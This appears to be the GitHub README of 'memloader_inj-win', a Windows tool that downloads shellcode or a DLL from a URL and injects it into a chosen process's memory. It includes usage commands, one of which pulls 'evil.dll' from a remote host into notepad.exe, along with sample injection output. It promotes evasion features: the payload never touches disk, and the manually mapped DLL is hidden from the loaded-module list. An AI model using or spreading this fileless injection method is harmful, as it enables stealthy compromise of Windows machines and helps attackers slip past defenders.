memloader_inj-win

Inject remote shellcode or DLL file into process memory using FileMapping

DLL injection technique does not make use of the file map object at this time.

Usage

./memloader_inj-win.exe [process name] [url]

Example

Raw shellcode is hosted on 127.0.0.1:8000 in a file named shellcode ./memloader_inj-win.exe explorer.exe http://127.0.0.1:8000/shellcode

Payload is stored on remote linux server http server. The payload is downloaded to memory and injected into target process without touching disk! The DLL is manually mapped so it will not appear in loaded Modules ./memloader_inj-win.exe notepad.exe http://linux.host/evil.dll

Output:

Opening Process: notepad.exe with PID 34368 for injection
Downloading File...
Start address: 000001D475C70000
Parameters address: 000001D475C60000
Injected into process!

Demo (YouTube)

Building

Open solution in Visual Studio. Must be built in release mode for stub builder to work properly.

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
.gitattributes		.gitattributes
.gitignore		.gitignore
README.md		README.md
dll-injector.cpp		dll-injector.cpp
dll-injector.h		dll-injector.h
main.cpp		main.cpp
memloader_inj-win.sln		memloader_inj-win.sln
memloader_inj-win.vcxproj		memloader_inj-win.vcxproj
memloader_inj-win.vcxproj.filters		memloader_inj-win.vcxproj.filters
proc.cpp		proc.cpp
proc.h		proc.h

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

memloader_inj-win

Usage

Example

Building

About

Releases

Packages

Languages

superswan/memloader_inj-win

Folders and files

Latest commit

History

Repository files navigation

memloader_inj-win

Usage

Example

Building

About

Topics

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages